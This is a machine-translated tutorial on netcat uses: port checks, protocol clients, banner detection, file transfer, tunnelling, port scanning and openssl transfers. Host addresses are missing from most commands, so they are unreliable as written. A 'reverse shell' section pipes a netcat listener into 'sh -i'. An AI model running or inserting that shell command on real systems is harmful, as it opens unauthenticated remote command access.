netcat Introduce

Netcat Is a mainstream command line network tool . It's mainly about building a community **** A transport layer connection , It can be read interactively 、 Write application layer data . Support TCP、UDP Two transport layer protocols , Also support Unix domain socket. Connect to the server as a client , As a server, it provides a network interface for some programs . Can be used to do some troubleshooting 、 File transfer 、 Four tier agent .

Unix domain sockets Use the address of the system file as your identity . It can be referenced by system processes . So two processes can open one at the same time Unix domain sockets To communicate . But this kind of communication happens in the kernel of the system, not in the network .


Some uses

Network troubleshooting

  1. Check if the port is enabled
    • nc 22 -v
  2. Check if the port is available
    • nc 2345 -v


Some plaintext protocols can interact with the server , Such as HTTP、Redis、memcache、smtp Such agreement

  1. HTTP client
    • Single HTTP request
      • printf "GET / HTTP/1.1\r\n\r\n" | nc 8000
    • Multiple HTTP request
      • nc 8080 < multiple_http_request
  2. Redis client
    • nc 6379
  3. SMTP client
    • nc 25 -v
  4. memcache client
    • nc 11211 -v
  5. JSON RPC client
    • nc 8101 -v

Protocol detection

For some non plaintext protocols , such as SSH、MySQL etc. , Although the interaction with the server is not very friendly , But we can do some protocol type detection .

  1. SSH Protocol detection

    • nc 22
    • Output : SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.3
  2. MySQL Protocol detection
    • nc 3306
    • Output : Q5.7.21-20-log}El/n}f a-ag[qgosOmysql_native_password

Server side

netcat You can listen to an address , As a server , Accept requests from clients .

  • Monitoring is local 2345 port nc -l 2345
File transfer
  • Server side : nc -l 2345 < test.php
  • client :nc > test.php
As a network interface to a program

You need to name the pipe (named pipe) Implementation of two processes of input and output redirection .

Named pipeline is a kind of first in first out communication mechanism between computer processes . It's a class Unix The expansion of the system's traditional pipeline . Traditional pipelines are anonymous , Its lifetime does not exceed the lifetime of the process that created the pipeline . But named pipes can live as long as the operating system runs .
With the traditional nameless shell The pipeline is different , Named pipes take advantage of the file system . Use mkfifo or mknod Create named pipes . Two processes can be opened by the name of the pipe 、 Read write pipeline . It's a simple one json rpc Realization , It receives requests from standard input , take jsonrpc Response output to standard output .

  • jsonrpc Server side : nc -l 2345 < /tmp/jsonrpc | ./ > /tmp/jsonrpc
  • jsonrpc client : nc 2345


Reverse proxy


mkfifo /tmp/netcat_tunnel
nc -l 8081 < /tmp/netcat_tunnel | nc 80 > /tmp/netcat_tunnel
curl -H 'Host:'


nc -l 8081 < /tmp/netcat_tunnel | nc 443 > /tmp/netcat_tunnel
curl -H 'Host:' -I -k


nc -l 8081 < /tmp/netcat_tunnel | nc 22 > /tmp/netcat_tunnel
ssh root@ -p8081 -i ~/.ssh/id_rsa


Port scanning

scanning Upper 22 To 80 Port number

nc -z 22-80

reverse shell

nc -l 2345 &lt; /tmp/netcat_tunnel | sh -i &gt; /tmp/netcat_tunnel


openssl The suit provides two subcommands ,s_server and s_client Namely ssl The server and ssl client .

Encrypted file transfer (openssl)

  1. Generate a self-signed certificate
    openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365
  2. start-up openssl Server side
    openssl s_server -key key.pem -cert cert.pem -port 2345 < test.php
  3. The client receives the file
    openssl s_client -host -port 2345 -sess_out test.php